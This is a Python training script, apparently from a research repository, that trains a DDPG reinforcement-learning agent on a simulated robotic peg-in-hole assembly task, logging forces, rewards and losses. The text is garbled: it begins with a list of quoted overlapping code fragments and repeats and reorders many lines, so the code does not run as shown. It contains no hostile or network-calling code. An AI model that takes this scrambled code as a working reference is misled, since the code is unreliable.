\"\"\"scale for execution", "mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] =", "-*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author :", "= np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing", "# logger.info('Pull up the pegs failed for the exceed force!!!') # exit() break", "configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single", "while pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation env", "key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the", "numpy as np import pandas as pd \"\"\"First the path should be added.\"\"\"", "from baselines import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std,", "simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as", "# pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True", "done = False forcement = [] Last_average_reward = 0. Number_episodes = 0. for", "as np import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\")", "import sys from baselines import logger from simulation_ddpg import DDPG from util import", "baselines import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max,", "1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs,", "= agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\",", "Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import", "# # if pull_safe is False: # logger.info('Pull up the pegs failed for", "U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory,", "= 0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action,", "sys from baselines import logger from simulation_ddpg import DDPG from util import mpi_mean,", "nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force", "gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # #", "is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r", "agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\",", "logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward", "as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb')", "if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance =", "agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses),", "critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:') logger.info(str(agent.__dict__.items())) saver", "agent.reset() # episode_step = 0 # episodes = 0 # t = 0", "= mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs) \"\"\"Train statistics\"\"\"", "agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0", "combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute", "expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6]))))", "# nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular()", "assembly failed for the exceed force!!!') # pull_done = False # while pull_done", "= agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries", "for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of", "combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std']", "render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise, popart,", "0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for", "# while pull_done is False and info: # pull_done, pull_safe = env.step_up() #", "= deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory", "False forcement = [] Last_average_reward = 0. Number_episodes = 0. for t_rollout in", "import MPI import numpy as np import pandas as pd \"\"\"First the path", "from simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util", "with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'):", "env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info,", "/ delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset()", "# if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!')", "failed for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for", "restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent", "= gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and", "logger.info('Peg-in-hole assembly failed for the exceed force!!!') # pull_done = False # while", "nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = []", "agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log", "the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards)", "is False: # exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time()", "the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward)", "re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in", "<filename>baselines/ddpg/src/simulation/Simulate_training.py<gh_stars>10-100 # -*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description :", "str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta =", "# if pull_safe is False: # logger.info('Pull up the pegs failed for the", "pull_done, pull_safe = env.pull_up() #True env # # if pull_safe is False: #", "sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) #", "mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py", "q \"\"\"scale for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action,", "done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False #", "# # if pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed", "False: # logger.info('Pull up the pegs failed for the exceed force!!!') # exit()", "not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\",", "t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly failed for exceed steps!!!') logger.info('The deepest", "mpi_mean(epoch_actor_losses) combined_stats['train/loss_critic'] = mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\"", "\"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale,", "= 0. episode_discount_reward = 0. q_value = 0. done = False forcement =", "-0.2, -0.2]) logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data'", "0. episode_discount_reward = 0. q_value = 0. done = False forcement = []", "Simulate_main Description : Author : <NAME> date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 -------------------------------------------------", "for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward =", "for execution in env\"\"\" new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward", "index=False) # re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf =", "0: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) if epoch == nb_epoch_cycles -", "done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done", "re_steps = pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',',", "'wb') as f: pickle.dump(env.get_state(), f) if eval_env and hasattr(eval_env, 'get_state'): with open(os.path.join(logdir, 'eval_env_state.pkl'),", "if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6])", "single worker\"\"\" # if rank == 0: # saver = tf.train.Saver() # else:", "failed for the exceed force!!!') # exit() break \"\"\"Episode failed and start pull", "= False # while pull_done is False and info: # pull_done, pull_safe =", "deque import pickle import sys from baselines import logger from simulation_ddpg import DDPG", "rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as", "# -*- coding: utf-8 -*- import os import time from collections import deque", "learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for", "mpi_mean(epoch_critic_losses) combined_stats['train/param_noise_distance'] = mpi_mean(epoch_adaptive_distances) \"\"\"save the model and the result\"\"\" saver.save(sess, model_directory +", "nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes)", "Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle", "== nb_epoch_cycles - 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) #", "util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as", "agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats()", "Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1) if epoch == 0 and cycle == 0: forcement.append(new_obs[0:6])", "result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False,", "critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with the following configuration:')", "new_obs, r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r", "sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and", "agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise,", "epoch_actor_lr = actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in", "r, done, info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\"", "= actor_lr / delay_rate epoch_critic_lr = critic_lr / delay_rate for cycle in range(nb_epoch_cycles):", "the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps']", "model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement", "False and info: # pull_done, pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up()", "logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if", "-*- import os import time from collections import deque import pickle import sys", "0: # saver = tf.train.Saver() # else: # saver = None # eval_episode_rewards_history", "mpi4py import MPI import numpy as np import pandas as pd \"\"\"First the", "delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward", "moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r - Long_term_reward # if", "and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\",", "logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'):", "1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances", "import time from collections import deque import pickle import sys from baselines import", "for the exceed force!!!') # pull_done = False # while pull_done is False", "force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r", "done and start pull the pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly", "param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward =", "MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2,", "cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action)", "epoch_qs = [] Force_moments = [] epoch_episodes = 0 Long_term_reward = - 0.10", "step by step\"\"\" if info is False: logger.info('Peg-in-hole assembly failed for the exceed", "stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for", "cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0.", "\"\"\"save the model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards =", "# re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory", "= time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward =", "- 0.10 for epoch in range(nb_epochs): \"\"\"Show the result for cycle 20 times", "Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q =", "exit() break \"\"\"Episode failed and start pull the pegs step by step\"\"\" if", "= critic_lr / delay_rate for cycle in range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs", "= 0. q_value = 0. done = False forcement = [] Last_average_reward =", "U import tensorflow as tf from mpi4py import MPI import numpy as np", "combined_stats['rollout/episode_steps'] = mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean']", "and info: # pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe =", "by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic,", "r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6])", "------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os", "pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs,", "batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm, reward_scale=reward_scale, restore=restore) logger.info('Using agent with", "pull_done = False # while pull_done is False and info: # pull_done, pull_safe", "import baselines.common.tf_util as U import tensorflow as tf from mpi4py import MPI import", "\"\"\"Force calibration\"\"\" # if env.robot_control.CalibFCforce() is False: # exit() delay_rate = np.power(10, 1", "= 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the result", "# agent.feed_back_explore(delta) Number_episodes = gamma + gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot", "and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result into", "collections import deque import pickle import sys from baselines import logger from simulation_ddpg", "= '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,", "logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes", "result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes)", "# if rank == 0: # saver = tf.train.Saver() # else: # saver", "re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory +", "env.step_up() # pull_done, pull_safe = env.pull_up() # True env # # if pull_safe", "for cycle 20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses =", "forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done)", "a single worker\"\"\" # if rank == 0: # saver = tf.train.Saver() #", "sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic, normalize_returns, normalize_observations,", "delta = r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is", "saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\"", "index=False) re_forcement = pd.DataFrame(Force_moments) re_forcement.to_csv(model_directory + 'simulation_forcement', sep=',', header=False, index=False) # re_steps =", "epoch_episodes) agent.log_scalar(\"episode_score\", mpi_mean(epoch_episode_rewards), epoch_episodes) agent.log_scalar(\"episode_steps\", mpi_mean(epoch_episode_steps), epoch_episodes) agent.log_scalar(\"episode_average_reward\", mpi_mean(epoch_episodes_average_reward), epoch_episodes) agent.log_scalar(\"episode_discount_score\", mpi_mean(epoch_episodes_discount_reward), epoch_episodes)", "+ \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward += r delta = r", "agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is", "\"\"\"Show the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses =", "if memory.nb_entries >= batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes =", "agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0", "failed for the exceed force!!!') # exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment')", "sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\"", "# -*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author", "\"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author : <NAME> date: 18-1-12 -------------------------------------------------", "# exit() break \"\"\"Episode failed and start pull the pegs step by step\"\"\"", "up the pegs failed for the exceed force!!!') # exit() break \"\"\"Episode failed", "else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes =", "noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise is not None: distance", "{} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor, critic, memory,", "# if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout+1)", "moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) # Force_moments.append(new_obs[0:6]) # env.plot_force(forcement,", "0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions", "time.time() epoch_episode_rewards = [] epoch_episode_steps = [] epoch_adaptive_distances = [] epoch_episodes_discount_reward = []", "sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes = 0 #", "env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. done = False", "al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if", "+ 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) # re_rewards.to_csv(\"re_rewards.csv\", sep=',', header=False, index=False) re_forcement =", "with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta')", "epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = [] Force_moments = [] epoch_episodes", "date: 18-1-12 ------------------------------------------------- Change Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*-", "mpi_mean(epoch_episode_steps) combined_stats['rollout/episodes'] = mpi_sum(epoch_episodes) combined_stats['rollout/actions_mean'] = mpi_mean(epoch_actions) combined_stats['rollout/actions_std'] = mpi_std(epoch_actions) combined_stats['rollout/Q_mean'] = mpi_mean(epoch_qs)", "Activity: 18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time", "r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum", "for t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt", "\"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) combined_stats['rollout/return_history']", "logger.info('scaling actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent =", "episode_reward += r delta = r - Long_term_reward # if memory.nb_entries >= batch_size", "0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling", "- 1 and cycle == nb_epoch_cycles - 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout", "DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as U import", "worker\"\"\" # if rank == 0: # saver = tf.train.Saver() # else: #", "# logger.info('Peg-in-hole assembly failed for the exceed force!!!') # exit() break Long_term_reward =", "if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f: pickle.dump(env.get_state(), f) if eval_env", "tensorflow as tf from mpi4py import MPI import numpy as np import pandas", "= pd.DataFrame(epoch_episode_steps) # re_steps.to_csv(\"re_steps.csv\", sep=',', header=False, index=False) # nf = pd.read_csv(\"data.csv\", sep=',', header=None)", "the result for cycle 20 times and Save the model\"\"\" epoch_actor_losses = []", "the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr", "= MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action =", "= r - Long_term_reward # if memory.nb_entries >= batch_size and param_noise is not", "the force and moments\"\"\" # if render: # forcement.append(new_obs[0:6]) # # print(forcement) #", "= agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout", "actions by {} before executing in env'.format(max_action)) model_directory = '/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines/baselines/ddpg/simulation_data' agent = DDPG(actor,", "- 1: forcement.append(new_obs[0:6]) Force_moments.append(new_obs[0:6]) # env.plot_force(forcement, t_rollout + 1) epoch_actions.append(action) agent.store_transition(obs, action, r,", "step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes", "and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay the learning", "+ gamma*Number_episodes Last_average_reward = r + gamma*Last_average_reward \"\"\"Plot the force and moments\"\"\" #", "epoch_adaptive_distances = [] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs", "batch_size and param_noise is not None: distance = agent.adapt_param_noise() epoch_adaptive_distances.append(distance) \"\"\"write the result", "if rank == 0: # saver = tf.train.Saver() # else: # saver =", "stuff only for a single worker\"\"\" # if rank == 0: # saver", "epoch_actions.append(action) agent.store_transition(obs, action, r, new_obs, done) obs = new_obs \"\"\"Episode done and start", "model and the result\"\"\" saver.save(sess, model_directory + 'simulation_model') # re_rewards = pd.DataFrame(epoch_episode_rewards) #", "# exit() delay_rate = np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards =", "be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,", "exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train in", "0. Number_episodes = 0. for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q", "nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01, eval_env=None, param_noise_adaption_interval=50, restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action", "epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >= batch_size and param_noise", "epoch_episodes) 